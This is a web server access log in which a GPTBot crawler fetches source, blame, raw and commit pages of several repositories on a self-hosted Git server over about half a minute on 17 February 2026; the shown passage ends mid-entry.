"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" -[17/Feb/2026:14:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13078] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" -[17/Feb/2026:14:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12294] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" -[17/Feb/2026:14:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13048] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13098] [Gzip 6.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:14:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 14487] [Gzip 7.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:14:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 242842] [Gzip 11.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:14:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:14:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 9860] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" -[17/Feb/2026:14:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11664] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12857] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13065] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12825] [Gzip 6.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11634] [Gzip 4.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" -[17/Feb/2026:14:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9852] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" -[17/Feb/2026:14:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" -[17/Feb/2026:14:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13690] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15573] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:14:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13957] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:14:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14229] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:14:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16501] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:14:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14841] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:14:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" -[17/Feb/2026:14:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10403] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" -[17/Feb/2026:14:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" -[17/Feb/2026:14:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15926] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" -[17/Feb/2026:14:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14284] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16994] [Gzip 8.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14985] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10806] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10695] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10829] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13819] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" -[17/Feb/2026:14:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10140] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 